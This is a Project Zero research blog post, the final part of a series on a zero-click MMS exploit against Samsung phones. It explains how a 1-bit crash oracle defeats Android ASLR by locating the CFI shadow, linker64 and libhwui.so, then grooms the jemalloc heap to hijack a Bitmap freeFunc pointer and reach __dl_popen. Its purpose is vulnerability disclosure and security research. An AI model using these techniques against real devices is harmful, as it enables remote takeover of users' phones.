Posted by Mateusz Jurczyk, Project Zero

This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. Previous posts are linked below:

- [this post]

Furthermore, with this last post, I have uploaded the source code of the MMS exploit to GitHub and the bug tracker. I hope it will serve as a useful reference while reading this blog, and help bootstrap further research in the area of MMS security.

Introduction

Up until this point in the story, I have managed to construct a reliable ASLR oracle delivered via MMS. It works by taking advantage of a buffer overflow to corrupt an android::Bitmap object on the heap and trigger a read from a controlled address, and abuses MMS delivery reports to transmit the oracle output (crash or lack thereof) back to the attacker. In fact, the oracle conveniently makes it possible to test the readability of an arbitrary memory range, not just a single address. On the other hand, due to the crash handling logic on Android, the queries must be sent at least one minute apart from each other, which severely limits the data throughput of the already restricted communication channel.

The current goal is to take the 1-bit information disclosure, and use it to build a high-level algorithm capable of remotely leaking full 64-bit addresses in an acceptable number of steps. The acceptability criterion is hard to clearly define, since in real life, it would mostly depend on the tolerable exploit run time specified by the malicious actor. The general rule of thumb is "the fewer, the better", but for the purpose of the exercise, I aimed to design an exploit running in a maximum of 8 × 60 = 480 oracle queries (and consequently, ~480 minutes). This corresponds to the average user's night sleep, and seemed like a plausible attack scenario for a zero-click MMS exploit.

There are two major aspects of defeating ASLR: what do we leak and how do we leak it. As disconnected as they might seem, the two elements are actually closely related. It might not matter which parts of the process address space we intend to use, if they don't overlap with what we can realistically find in memory. With that in mind, I decided to start by familiarizing myself with the typical address space of the com.samsung.android.messaging process, and the overall state of ASLR on Android 10. This would hopefully give me an understanding of some of its weaknesses (if any), and ideally some ideas for bypassing the mitigation. From the outset, the only thing I knew for a fact was the Zygote design, which guaranteed persistent addresses across different instances of a crashing app, and was a crucial part of the attack. I learned the rest mostly by experimenting with a rooted Galaxy Note 10+ phone, as outlined in the sections below.

Android memory layout

Throughout this blog post, we'll be analyzing the Messages memory map found in the /proc/pid/maps pseudo-file. When we look at a few different maps (obtained by rebooting the phone several times to re-randomize the memory layout), we can immediately notice that a majority of mappings, including all shared objects, reside somewhere between 0x6f00000000 and 0x8000000000, with a few exceptions:

- Mappings of .art, .oat and .vdex files under /system/framework, and some Dalvik-related regions in the low 4 GB of the address space.

- An isolated mapping of the /system/bin/app_process64 ELF somewhere between 0x5500000000 and 0x6500000000.

Neither of these cases seems particularly interesting right now, although we might want to go back to the low 32-bit mappings if we don't have any success with the higher regions. In general, the usual suspects for leaking (heap areas, libc.so, libhwui.so, …) are all located between 0x6f00000000 and 0x8000000000, which amounts to 68 GB of effective randomization range. In other words, that's over 24 bits of entropy at page granularity, a number that is certainly not very encouraging on its own. However, let's not despair just yet and instead let's look closer at how the mappings are laid out in the address space.
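The 68 GB and 24-bit figures can be double-checked with a few lines of arithmetic. This is only a sanity check built on the two bounds quoted above and an assumed 4 kB page size; the variable names are mine.

```python
import math

LOW, HIGH = 0x6F00000000, 0x8000000000  # range bounds quoted in the text
PAGE = 4096                             # assuming 4 kB pages

span = HIGH - LOW                       # size of the randomization range in bytes
pages = span // PAGE                    # number of page-aligned positions
bits = math.log2(pages)                 # entropy if every page were equally likely

print(f"{span / 2**30:.0f} GB, {pages} pages, {bits:.2f} bits")
```

The page count is also the number of pixels needed to draw the whole range at one pixel per page.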



We could continue manually inspecting the maps files to look for more insights, but I found that staring at thousands of hexadecimal addresses was not an effective way to reason about the memory layout. As a fan of memory visualization, I wrote a quick Python script to convert a textual maps file to a 2048x8704 bitmap, where each pixel represented one 4 kB page and the color denoted its state and access rights:

- black for unmapped pages

- gray for mapped no-access pages

- green for read-only pages

- blue for read/write pages

- red for execute-only pages
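The script itself is not reproduced here, so the following is only a rough sketch of how such a conversion could start: it parses maps-style lines and assigns each mapped page a color from the palette above. The function names, the sample lines and the choice to group r-x pages with green are all my assumptions, and the actual image writing is left out.

```python
import re

PAGE = 4096
# Start-end address pair followed by the permission field, e.g. "r-xp".
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+([r-][w-][x-])[ps]")

def color_for(perms):
    """Map an 'rwx' permission triple to the palette described above."""
    r, w, x = (c != "-" for c in perms)
    if not (r or w or x):
        return "gray"    # mapped, no access
    if x and not r:
        return "red"     # execute-only
    if w:
        return "blue"    # read/write
    return "green"       # read-only (assumption: r-x is grouped here too)

def page_colors(maps_text, low, high):
    """Return {page_index: color} for mapped pages inside [low, high)."""
    colors = {}
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        start, end = int(m.group(1), 16), int(m.group(2), 16)
        color = color_for(m.group(3))
        for addr in range(max(start, low), min(end, high), PAGE):
            colors[(addr - low) // PAGE] = color
    return colors

# Made-up sample lines in the /proc/pid/maps format, for illustration only.
SAMPLE = """\
7000000000-7000002000 r--p 00000000 fd:00 1 /system/lib64/example.so
7000002000-7000003000 --xp 00002000 fd:00 1 /system/lib64/example.so
7000003000-7000004000 rw-p 00003000 fd:00 1 /system/lib64/example.so
7000004000-7000005000 ---p 00000000 00:00 0
"""
print(page_colors(SAMPLE, 0x7000000000, 0x7000010000))
```

Pages missing from the returned dictionary are unmapped and would be drawn in black; a page index converts to pixel coordinates with `divmod(index, 2048)` for a 2048-pixel-wide image.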

Converting three random memory layouts of the Messages process yielded the following results:

ASLR definitely works, as all memory is mapped at different addresses across reboots. On the other hand, the entropy of the mappings relative to each other is rather low, as they seem to be packed very close together in the scope of each memory map. Furthermore, they add up to a relatively large memory area compared to the 68 GB randomization space. There is one huge continuous read-only (green) memory mapping that particularly stands out:

This is an auxiliary memory region for Control Flow Integrity (CFI), a security mitigation enabled in Android user-mode code since version 8 and in kernel-mode since Android 9 (source). As explained in the documentation, the shadow area stores information that helps locate the special __cfi_check function for each code page of a CFI-enabled library or executable. There are 2 bytes of metadata reserved for each page in the address space, and the overall CFI shadow spans 2 GB of memory (for instance in the layout above, 0x74dc6ea000 - 0x745c6ea000 = 0x80000000). This means that there is always a continuous 2 GB chunk of memory somewhere in the total 68 GB search space, and other interesting mappings are located in its direct vicinity.

Because the shadow area is readable, it is detectable with our existing ASLR oracle. We can find it by running a linear search of the address space in 2 GB intervals, and once a readable page is detected, by checking if the 1 GB directly before or after it is readable too. This logic will deterministically find a valid address inside the CFI shadow in between 2 and 36 oracle queries (plus potentially one or two for some failed 1 GB checks). From an attacker's perspective, this is fantastic news, as it makes it possible to identify an approximate location of data and code in a very reasonable run time.
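To make the search concrete, here is a small simulation of it. It is a sketch under stated assumptions rather than the exploit code: the oracle is a local stand-in for the MMS-based one, `make_oracle` and `find_shadow_address` are names I made up, and the small decoy region exists only to exercise a failed 1 GB check. The shadow bounds are the ones from the example layout above.

```python
GB = 1 << 30
PAGE = 4096
LOW, HIGH = 0x6F00000000, 0x8000000000  # search range from the text

def make_oracle(regions):
    """Simulated oracle: True if [addr, addr+size) lies inside one readable region."""
    def oracle(addr, size):
        oracle.queries += 1
        return any(start <= addr and addr + size <= end for start, end in regions)
    oracle.queries = 0
    return oracle

def find_shadow_address(oracle):
    """Probe one page every 2 GB; confirm a hit with a 1 GB range check."""
    for addr in range(LOW, HIGH, 2 * GB):
        if not oracle(addr, PAGE):
            continue
        # A probe inside a 2 GB region has at least 1 GB of it on one side.
        if oracle(addr - GB, GB) or oracle(addr, GB):
            return addr
    return None

shadow = (0x745C6EA000, 0x74DC6EA000)   # bounds from the example layout
decoy = (0x7100000000, 0x7100001000)    # made-up single readable page
oracle = make_oracle([decoy, shadow])
hit = find_shadow_address(oracle)
print(hex(hit), oracle.queries)
```

Because the probes are spaced exactly as far apart as the shadow is long, exactly one of them lands inside it, which is what makes the scan deterministic.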

Knowing some readable address is already big progress, but it isn't readily usable yet. However, thanks to the fact that our oracle can probe entire memory ranges, we can use a simple binary search algorithm to determine the beginning or end of any readable area in around log2(n) steps, where n is the maximum expected size of the region in pages. For a 2 GB region, that's a fixed number of 19 iterations, so the total number of queries needed to find the bounds of the CFI shadow is between 21 and 55.
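The binary search can be sketched as follows, again against a simulated oracle. The helper name `find_region_end` and the convention of returning a query count are my own; the only inputs are a known-readable address and an upper bound on the region size.

```python
PAGE = 4096

def find_region_end(oracle, addr, max_size):
    """Return (end, queries), where end is the first non-readable address
    after `addr`. Assumes `addr` is readable and that the readable run
    starting at `addr` is at most `max_size` bytes long."""
    lo, hi = 1, max_size // PAGE + 1   # lo pages are readable, hi pages are not
    queries = 0
    while hi - lo > 1:
        mid = (lo + hi) // 2
        queries += 1
        if oracle(addr, mid * PAGE):   # is [addr, addr + mid pages) all readable?
            lo = mid
        else:
            hi = mid
    return addr + lo * PAGE, queries

# Simulated CFI shadow using the bounds from the example layout.
START, END = 0x745C6EA000, 0x74DC6EA000
oracle = lambda addr, size: START <= addr and addr + size <= END

end, queries = find_region_end(oracle, 0x7480000000, 2 << 30)
print(hex(end), queries)
```

With a 2 GB bound there are 2^19 candidate page counts, so the loop runs exactly 19 times regardless of where the region actually ends. Finding the start of a region works the same way with the range extended downwards instead.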

Ironically, CFI is not even enabled for the libhwui.so library that we're exploiting, so while it is technically a mitigation, it worked solely in the attacker's favor in this case. This is not to say that CFI or other defense-in-depth mechanisms are bad to begin with, but rather that they should be carefully designed and scrutinized for regressions that might bring their overall security impact down to a net negative. This specific CFI weakness was fixed by defaulting to PROT_NONE as the access rights of the unused parts of the shadow (more than 99% of its space), and it will ship in a future version of Android. For a somewhat related read on the subject of mitigation (in)security, please see Jann Horn's "Mitigations are attack surface, too" post on the Project Zero blog.

Finding initial cheap exploit gadgets – linker64

Now that we can establish the start and end of the 2 GB CFI region, we should use the information to disclose the base addresses of some nearby libraries. When I inspected the memory maps on my test phone, I noticed that a fixed set of 168 modules was persistently mapped at addresses higher than the shadow, and 54 modules below it. All libraries that I was potentially interested in leaking (e.g. libhwui.so, libc.so) were placed within 128 MB from the end of the CFI shadow, so I decided to focus on that area. Let's zoom in on the three unique memory layouts visualized earlier in this post:

There aren't too many similarities between these three layouts, and in hindsight, this is expected as the library load order has been randomized in the Android linker since 2015. As a result, there aren't any constant library offsets relative to the CFI shadow that we could readily use. Nonetheless, one region has an exceptionally low variance between all three memory layouts – the bottom green stripe separated from the rest of the libraries with a large non-readable gap (marked in gray):

What is it?

As it turns out, it is not one mapping but several adjacent Linux internal regions, with a bulk of the address range taken up by the /apex/com.android.runtime/bin/linker64 module (linked to by /system/bin/linker64). It is the interpreter used by other dynamically linked executables, equivalent to /lib64/ld-linux-x86-64.so.2 on Linux x64:

The fact that linker64 is the first ELF loaded in memory by the kernel explains its low address entropy relative to the CFI shadow – it is not subject to the same load order randomization as other libraries. The question is, is it useful for exploitation?

In the firmware of my test Note 10+ device (February 2020 patch level), the linker64 file is 1.52 MB in size. If we open it in IDA Pro (or your favorite disassembler) and browse the functions list, we can immediately spot a number of routines that could be chained together or used on their own to achieve arbitrary code execution. For example, there is a generic __dl_syscall function for invoking system calls, wrappers for specific syscalls operating on files and memory (e.g. __dl_open64, __dl_read, __dl_write, __dl_mmap64, __dl_mprotect), and even functions for starting new processes such as __dl_execl, __dl_execle, __dl_execve, and __dl_execvpe. However, the absolute number one is the __dl_popen function with the following definition:

For the attacker's purposes, the routine is equivalent to libc's system() in that it executes arbitrary shell commands. The only notable difference is that it also accepts a second argument that has to be a valid, readable pointer. Otherwise, they're essentially the same, which means that we likely won't have to locate libc.so or similar libraries in memory, as linker64 already provides plenty of practical exploitation gadgets. If you're curious how __dl_popen even made its way into linker64, it's through convertMonotonic defined in system/core/liblog/logprint.cpp (called by __dl_android_log_formatLogLine), which uses the function to parse dmesg output:

Now that we know we are interested in leaking linker64, we should figure out how many oracle queries it will take. To find a precise answer, I used my test device to generate a corpus of 4000 unique memory maps, which should be a statistically significant sample size for running various kinds of analyses. Within that corpus, the offset of the linker64 base relative to the end of the CFI shadow ranged between 107.94 MB and 108.80 MB, so less than 1 MB of variance. If we also account for any readable regions directly adjacent to the CFI shadow, which cannot be distinguished from the shadow memory by our oracle, the distance to linker64 ranged from 104.05 MB to 108.40 MB. Just to add a bit of versatility in my exploit, I implemented the search starting from a round 100 MB offset from the CFI end.

The logic of identifying linker64 in memory is as follows: we probe a single page in 1088 kB intervals (the span of linker64 in the address space), and when we encounter a readable one, we check if there is a 544 kB accessible region to the right or left of the page – if that's the case, we found some address inside the ELF. We then use the binary search algorithm again, which takes exactly 9 iterations to determine the end of the readable area. After subtracting the size of the module and the few pages of adjacent memory (0x11B000 in total) from the resulting address, we get the base address of linker64.

With this logic, my testing indicates that the leaking of CFI shadow + linker64 takes between 38 and 75 oracle queries, with an average of 56.45 queries on the memory maps corpus mentioned before. This translates to around 40-80 minutes of exploit run time, which is a very satisfactory efficacy so far.

Locating libhwui.so in memory

At this point in the research, I spent some time trying to complete the attack based solely on the linker64 base address. The key piece of the puzzle was a suitable gadget function which had to meet the following conditions:

- Had its address stored somewhere in the static memory of the module, such that we could point the fake vtable of the android::Bitmap object there and trigger a call to the function.

- Called a function pointer loaded from the first argument, preferably with parameters that were either controlled or pointed to controlled data.

Unfortunately I didn't manage to find any applicable gadgets during my brief manual analysis, but I don't rule out the possibility that they exist and perhaps could be recognized with a more automated approach. This is left as an open challenge to the reader, and I'll be very interested to learn how RCE can be achieved with the help of linker64 alone.

As we can remember from Part 3, it is possible to call a controlled function pointer with two arbitrary arguments by corrupting the android::Bitmap.mPixelStorage.external structure fields. The only requirement is that we must know the base address of libhwui.so, to restore the Bitmap vtable pointer to its original value in the linear buffer overflow. And so, I started contemplating how the specific library could be efficiently recognized among all the other 168 shared objects loaded in random order within ~100 MB of the CFI shadow. I turned my eyes to the memory visualization bitmaps again.

For simplicity, let's eliminate blue from the color palette of the memory map (previously used for rw- mappings), and use green for all kinds of readable pages (incl. r--, rw- and r-x). This is closer to how the ASLR oracle "sees" memory, and it should make it easier to understand the layout of memory we're operating on:

The numerous red regions in the bitmap are not inaccessible PROT_NONE mappings, but rather they are sections of code with the "r" bit off:

The nonstandard memory rights are caused by a new Execute Only Memory (XOM) mitigation introduced in Android 10. Unfortunately, similarly to the CFI shadow, the mitigation doesn't interfere with our exploit in any way and instead makes the exploitation considerably easier. That's because every library in memory is now fragmented into three parts:

- A readable area used by .rodata, .eh_frame and similar segments.

- A non-readable area for the .text and .plt segments.

- A readable area for sections such as .data and .bss.

The middle non-readable part creates an observable gap of a fixed size, which can be successfully used to fingerprint libraries in memory. To make things even worse, this is especially easy for libhwui.so, because it is by far the largest shared object loaded in the address space, spanning 7.94 MB split into: 2.17 MB (readable), 5.59 MB (execute-only), 180 kB (readable). In the memory map above, it is easy to spot as the single biggest continuous chunk of red color:

Thanks to XOM, the question is not if we can find libhwui.so, but how efficiently we can find it. Let's consider our options.

Memory scanning algorithm #1 – basic search over mapped regions

To reiterate our working assumptions, the goal is to quickly and accurately identify the 7.94 MB libhwui.so mapping within ~100 MB of the end of CFI shadow. The first algorithm that I tested was very simple:

- Check the readability of one page in 2.17 MB intervals, such that we always test a page inside the first readable libhwui.so region of that size.

- If the page is readable, find the end of the accessible region with binary search: let's call it X.

- Test if the surrounding memory looks like our library:

  - oracle(X - 2.17 MB, 2.17 MB) == True

  - oracle(X + 5.59 MB - 4 kB, 4 kB) == False

  - oracle(X + 5.59 MB, 180 kB) == True

- If all conditions are met, we have a candidate for libhwui.so.
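The steps above can be sketched as a small simulation working in units of 4 kB pages. Everything here is illustrative: the page counts are my rounded approximations of the 2.17 MB, 5.59 MB and 180 kB figures, the oracle is simulated over a set of readable pages, and the early rejection of readable runs longer than the first library region is my own shortcut rather than something taken from the exploit.

```python
HEAD, TEXT, TAIL = 556, 1431, 45   # approx. 2.17 MB, 5.59 MB, 180 kB in pages
AREA = 25600                       # 100 MB search window in pages

def make_oracle(readable_pages):
    """Simulated range oracle over a set of readable page numbers."""
    def oracle(page, count=1):
        oracle.queries += 1
        return all(p in readable_pages for p in range(page, page + count))
    oracle.queries = 0
    return oracle

def region_end(oracle, page, limit):
    """Binary search for the end of the readable run starting at `page`,
    assuming the run is at most `limit` pages long."""
    lo, hi = 1, limit + 1
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(page, mid):
            lo = mid
        else:
            hi = mid
    return page + lo

def looks_like_libhwui(oracle, x):
    """The three checks from the list above, with X expressed in pages."""
    return (oracle(x - HEAD, HEAD)
            and not oracle(x + TEXT - 1, 1)
            and oracle(x + TEXT, TAIL))

def scan_light(oracle):
    """Return the page of the first candidate base, or None."""
    for page in range(0, AREA, HEAD):
        if not oracle(page):
            continue
        if oracle(page, HEAD + 1):
            continue               # run too long to be the first region (my shortcut)
        x = region_end(oracle, page, HEAD)
        if looks_like_libhwui(oracle, x):
            return x - HEAD
    return None

# Made-up layout: one unrelated readable region plus the library at page 3000.
base = 3000
pages = set(range(1000, 1300))
pages |= set(range(base, base + HEAD))
pages |= set(range(base + HEAD + TEXT, base + HEAD + TEXT + TAIL))
oracle = make_oracle(pages)
print(scan_light(oracle), oracle.queries)
```

This corresponds to the light mode described below, since it returns as soon as one candidate passes the three checks.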

For fully reliable output, the algorithm collects all candidates over the 100 MB area, and if there is more than one at the end of the scan, it makes additional queries to check non-readability at random offsets of the suspected .text sections, until a single candidate remains. However, since the heuristics used to find the candidates are already quite strong, we might cut some corners and just return the first candidate we encounter, hoping it's the correct address. This is what I call "light mode", and in my research, I've tested both modes of operation of each algorithm to compare their accuracy and performance against my memory map corpus.

Let's look at the numbers of our initial algorithm:

For a first idea, that's not a terrible outcome – especially in light mode, the number of queries and the accuracy are somewhat acceptable. The 0.9% error rate is caused by the fact that we don't verify the non-readability of the whole 5.59 MB .text section, and we only know that it's non-readable at the beginning and end. This may lead to false positives if other libraries are laid out in memory so unfavorably that they produce a mapping boundary at the offset we are testing for. The full mode mitigates the problem, but at the cost of more than doubling the average number of needed queries, which doesn't seem worth the extra 0.9% accuracy. It is probably more effective to just add a few more random checks of the .text segment to light mode, which would still retain its heuristic nature, but could reduce the error rate to a negligible percentage.

Now that we have a general idea of what the libhwui.so detection algorithm may look like, let's see if we can make any substantial improvements.

Memory scanning algorithm #2 – forward page sampling

In the previous algorithm, we spent 9 iterations in each binary search to find the end of a region, and we invoked it for each of up to 100 ÷ 2.17 ~= 46 readable pages we could have encountered during the scan. This is very wasteful, because most locations in memory look nothing like libhwui.so, and we can quickly disqualify them as candidates without involving the costly operation. The key is to better utilize the fact that we are looking for a huge 5.59 MB continuous non-readable region, whereas most of the search space is actually readable.

Specifically, we will continue sampling pages in 2.17 MB intervals, but instead of treating every readable page as a valid lead to follow up on, we will only act on a series of [1, 0, 0] oracle results. This is how libhwui.so will manifest itself in the sampling output, since the 2.17 MB readable prologue will generate exactly one "1", and the 5.59 MB gap will produce at least two 0's. The three final conditions verified for each candidate in algorithm #1 remain the same here. Of course, the light mode of this improved method is still prone to false positives, but the error rate should be lower because we're verifying two additional offsets in the non-readable range. Furthermore, the algorithm should be more efficient, since we're performing the same amount of sampling but far fewer binary searches. Let's see if this is reflected in the numbers of my memory maps data set:
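The claim that the library always shows up as [1, 0, 0] can be checked exhaustively for every possible alignment of the sampling grid. The sketch below does that in page units; the page counts are my rounded approximations of the sizes quoted earlier, and the function names are made up.

```python
HEAD, TEXT, TAIL = 556, 1431, 45  # assumed page counts for 2.17 MB, 5.59 MB, 180 kB

def readable(offset):
    """Readability of the page `offset` pages past the library base."""
    return 0 <= offset < HEAD or HEAD + TEXT <= offset < HEAD + TEXT + TAIL

def samples(phase, step=HEAD, count=3):
    """Oracle bits seen when the first sample lands `phase` pages into the library."""
    return [int(readable(phase + k * step)) for k in range(count)]

# Try every position at which a sample can fall inside the first readable region.
signatures = {tuple(samples(phase)) for phase in range(HEAD)}
print(signatures)  # {(1, 0, 0)}
```

The execute-only gap is more than twice as long as the sampling interval, so the two samples following the "1" can never escape it.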

Indeed, both the accuracy of the light mode and the oracle query counts have greatly improved. We can now locate libhwui.so with almost full confidence in an average of ~45 iterations, which is a very satisfying result. Combined with the avg. 56.45 queries needed to leak the end of CFI shadow and linker64 base address, it adds up to ~100 queries statistically needed to execute the attack, which is well within the bounds of my initial objective (<480 queries total).

The algorithm in this shape was used in the recording of the Galaxy Note 10+ exploit demo video in April 2020, with a minor difference of using 2 MB sampling intervals instead of 2.17 MB. Since then, I have come up with some further optimizations that I will discuss in the section below.

Memory scanning algorithm #3 – the Boyer-Moore optimization

If we think about it, our algorithm currently spends most of the time performing a kind of string searching of the [1, 0, 0] pattern over a sampled view of the address space. In the process, we linearly obtain the values of all consecutive samples until a match is found. But perhaps we could borrow some ideas from classic string searching algorithms to reduce the number of comparisons, and thus the number of pages needed to be sampled, too?

One idea that I had was to run the matching starting from the "tail" (last value) of the pattern and iterating backwards, instead of starting from the head. This is a concept found in the Boyer-Moore algorithm, and it improves the computational complexity by making it possible to "skip along the text in jumps of multiple characters rather than searching every single character in the text". This is especially true for a pattern of the form N × [1] + M × [0], such as [1, 0, 0]. For instance, if there is a mismatch on the last value of the pattern, we know for sure that there won't be a match at offset 0 (currently tested) or 1, and we can resume the search from offset 2, completely skipping an extra offset in the text.

Let's demonstrate this on an example:

As we can see, thanks to the multi-offset jumps enabled by early mismatches in the tail of the pattern, 5 out of 14 locations in the sampled memory map were never touched by the algorithm, and their values didn't have to be determined by the ASLR oracle. In this case, it is a 35% reduction of the number of necessary oracle queries, and the effect of the optimization can be further amplified by decreasing the sampling interval to some extent, thus making the searched pattern longer. The fact that most of the search space contains readable regions contributes to its success, as the tail comparisons tend to fail early, leading to large jumps skipping broad ranges of memory.
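The effect is easy to reproduce in a toy setting. The sketch below is written in the spirit of Boyer-Moore rather than as a textbook implementation: instead of precomputed shift tables, it caches every sample it has paid for and skips any alignment that a cached sample already rules out. The function name, the `tail_first` switch and the 14-element sample text are my own, and the text is not the one from the example above.

```python
def find_pattern(sample, n, pattern, tail_first=True):
    """Find the first offset where `pattern` matches the sampled text.
    `sample(k)` stands for one oracle query; returns (offset, queries)."""
    cache, m, i = {}, len(pattern), 0
    order = range(m - 1, -1, -1) if tail_first else range(m)
    while i + m <= n:
        # Skip alignments contradicted by samples we already know.
        if any(cache.get(i + j, pattern[j]) != pattern[j] for j in range(m)):
            i += 1
            continue
        for j in order:
            if i + j not in cache:
                cache[i + j] = sample(i + j)   # one new oracle query
            if cache[i + j] != pattern[j]:
                break                          # mismatch is now cached
        else:
            return i, len(cache)
    return None, len(cache)

# Mostly readable memory with a single [1, 0, 0] occurrence at offset 10.
text = [1] * 11 + [0, 0, 1]
lookup = lambda k: text[k]

print(find_pattern(lookup, len(text), [1, 0, 0], tail_first=False))
print(find_pattern(lookup, len(text), [1, 0, 0], tail_first=True))
```

Both calls report the match at offset 10, but the tail-first variant needs noticeably fewer samples because each readable page found at the tail position rules out two alignments at once.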

I implemented the optimization in my exploit and experimented with various configurations, to finally conclude that the most efficient setting was a 1 MB sampling interval and a [1, 1, 0, 0, 0, 0, 0] oracle pattern. It was measured to have the following performance:

In my opinion, that's a solid result. In comparison to algorithm #2, the maximum number of queries was reduced from 120 to 64, the average number of queries decreased by 34% (44.90 → 29.63), and the light mode accuracy reached 100%, making it virtually indistinguishable from the full mode. I think it's a good time to wrap up the work on the libhwui.so leaking logic, but if you have any further ideas for improvement, I'm all ears!

Putting the ASLR bypass together

We can now combine the CFI shadow, libhwui.so and linker64 disclosure logic and run some final benchmarks on the code. In my testing, the final exploit takes between 45 and 129 oracle queries to calculate the two library base addresses, with an average of 85.91 requests. Assuming that the heap buffer overflow is very (99%+) reliable, and every query is only made once, this is equivalent to around 1 – 2.5 hours of run time. An animation illustrating the end-to-end process of a remote ASLR bypass is shown below:

It's worth noting that the animation depicts the exact same queries that were made in the original exploit demo recorded in April, so it's based on the slightly slower algorithm #2. The usage of the optimized algorithm #3 would further reduce the number of necessary queries for this memory layout from 86 down to 75.

Moving on to RCE

As discussed in Part 3, knowing the locations of libhwui.so and linker64 allows us to redirect the Bitmap vtable to any function pointer found in the static memory of these modules, or call any of their functions directly with two controlled arguments, by corrupting the android::Bitmap.mPixelStorage.external structure. The simplest way forward would be to call the __dl_popen routine with a shell command to execute, but that requires us to pass an address of our own ASCII string, which we currently don't know. I have briefly looked for ways to inject controlled data into the static memory of libhwui.so as a side effect of some multimedia decoding, but I failed to identify such a primitive.

Of course, the current capabilities at our disposal are so strong that completing the attack should be a formality. Since we can trigger x(y,z) calls where x, y and z are all controlled 64-bit values, we could find a write-what-where code gadget and use it twice in a row to set up a minimalistic 16-byte reverse shell command in some writable memory region. This could certainly work, but it would require the android::Bitmap overflow to succeed three times in a row (twice for the write-what-where and once for the RCE trigger) without any app restarts in between, which seemed to be a risk to the reliability of the exploit. I had hoped to achieve remote code execution in just a single MMS, but how do we do it without any clue as to the location of our data in memory?

One idea would be to have a pointer to our data passed as the first argument of the hijacked function call, without explicitly knowing or leaking the value of the address. Let's see if this could be applied to the mPixelStorage.external structure with a partial overflow, and how it overlaps with the legitimately used heap structure within the encompassing mPixelStorage union:

Conveniently, heap.address points to the bitmap pixel buffer and it overlaps with external.address, the first parameter passed to external.freeFunc. On the other hand, with the linear overflow we're using, it is impossible to modify external.freeFunc without first destroying the values of external.address and external.context. Does it mean that the whole idea is doomed to fail? Not at all, but it will require slightly more heap grooming than originally expected.

Calling functions with a string argument

Overall, I have discovered two different methods to pass string parameters to arbitrary functions – one during the initial exploit development in April 2020, and the second, admittedly a simpler one, while writing this blog post in July. :) I will briefly discuss both of them below. If you wish to follow along, you can use the reference android::Bitmap corruption Qmage sample shared on my GitHub.

Technique #1 – an uninitialized freeFunc pointer

We already know that we can't reach the external.freeFunc pointer without corrupting the other two fields in the structure. However, let's consider what happens if we still cause the heap → external type confusion by switching android::Bitmap.mPixelStorageType to External, but stop the overflow at that and don't corrupt anything beyond offset 0x70. As expected, external.address will assume the value of heap.address, external.context will be equivalent to heap.size, and external.freeFunc will remain uninitialized, because there is no corresponding field at that offset in the heap structure. Later on, when execution reaches the Bitmap::~Bitmap destructor, it will attempt to call the uninitialized function pointer. At that point, the first argument points to a buffer with our data (great!), but we don't really control the instruction pointer… or do we?
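The overlap can be modeled with a few lines of ctypes. This is a simplified reconstruction from the description above, not the real class definition: only the heap and external members are included, all fields are assumed to be 8 bytes wide, and the addresses are made up.

```python
import ctypes

class Heap(ctypes.Structure):
    _fields_ = [("address", ctypes.c_uint64),
                ("size", ctypes.c_uint64)]

class External(ctypes.Structure):
    _fields_ = [("address", ctypes.c_uint64),
                ("context", ctypes.c_uint64),
                ("freeFunc", ctypes.c_uint64)]

class PixelStorage(ctypes.Union):
    # Simplified: any other members of the real union are omitted here.
    _fields_ = [("external", External), ("heap", Heap)]

storage = PixelStorage()
# Stale bytes left behind by whatever occupied the chunk earlier.
storage.external.freeFunc = 0x4141414141414141
# The legitimate constructor only initializes the heap view.
storage.heap.address = 0x7000001000   # made-up pixel buffer address
storage.heap.size = 160

# Reinterpreting the same bytes as `external` after the type confusion:
print(hex(storage.external.address),   # the pixel buffer pointer
      storage.external.context,        # the buffer size
      hex(storage.external.freeFunc))  # untouched stale value
```

The freeFunc field sits at offset 0x10 of the union, past the end of the 0x10-byte heap structure, which is why initializing the heap view never overwrites it.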

In order to set the uninitialized android::Bitmap.external.freeFunc field to some specific value, we would have to trigger an allocation in the same bucket as the Bitmap (129-160 bytes), fill it with our data, have it freed, have one other chunk in that bin size freed, and then have the Bitmap object allocated shortly after. This is caused by jemalloc's LIFO tcaches, which return the most recently freed region in the given bin size, and the fact that the Bitmap creation involves two 160-byte allocations: one for the (overflown) pixel buffer and the other for the C++ object itself. To reiterate, here's an example of a desired set of heap operations that would allow us to control external.freeFunc:

- malloc(160) → X

- malloc(160) → Y

- /* write controlled data to Y */

- free(Y);

- free(X);

- malloc(160) → X (Bitmap pixel backing buffer)

- malloc(160) → Y (Bitmap C++ object)
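The reuse order in the sequence above can be illustrated with a toy model in which freed chunks of one size class are kept on a stack and the most recently freed one is handed out first. It is not jemalloc and ignores everything except that ordering; the class name, the addresses and the 0x42 marker value are made up.

```python
class ToyTcache:
    """Toy cache for a single size class: most recently freed chunk is reused first."""
    CHUNK = 160

    def __init__(self):
        self.free_stack = []     # freed chunks, most recent last
        self.next_addr = 0x1000  # made-up address of the next fresh chunk
        self.contents = {}       # bytes last written to each chunk

    def malloc(self):
        if self.free_stack:
            return self.free_stack.pop()
        addr = self.next_addr
        self.next_addr += self.CHUNK
        return addr

    def free(self, addr):
        self.free_stack.append(addr)   # contents are left untouched

heap = ToyTcache()
x = heap.malloc()
y = heap.malloc()
# Controlled data written to Y, with a marker value at offset 0x90.
data = bytearray(160)
data[0x90:0x98] = (0x4242424242424242).to_bytes(8, "little")
heap.contents[y] = bytes(data)
heap.free(y)
heap.free(x)

pixel_buffer = heap.malloc()    # reuses X, the chunk freed last
bitmap_object = heap.malloc()   # reuses Y, still holding the stale data
stale = heap.contents[bitmap_object][0x90:0x98]
print(pixel_buffer == x, bitmap_object == y, stale.hex())
```

In the model, the chunk that ends up holding the Bitmap object still carries the marker at offset 0x90, which is where the uninitialized freeFunc field lives.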

The Bitmap object is generally allocated very early in the image decoding process, but there is a bit of Qmage-related code that executes right before it: the header parsing code reached through the SkQmgCodec::MakeFromStream → ParseHeader → QuramQmageDecParseHeader chain of calls. We can use the SkCodecFuzzer harness with the -l option to obtain a list of heap-related function calls made during header parsing, on the example of the Qmage test file:

In the above listing, call stacks were edited out for brevity, and the trace was adjusted to match the allocations sequence observed on a real Android device. There are a few malloc calls, but most of them outlive the header parsing process, except for the three allocations of size 17, 1024 and 7160, highlighted in orange. They are all made during the decompression of the optional color table, and have the following functions:

- Region X (17 bytes) is used to store the raw, zlib-compressed color table read directly from the input Qmage stream.

- Region Y (1024 bytes) is used to store the inflated color table, which further undergoes some Qmage-specific processing.

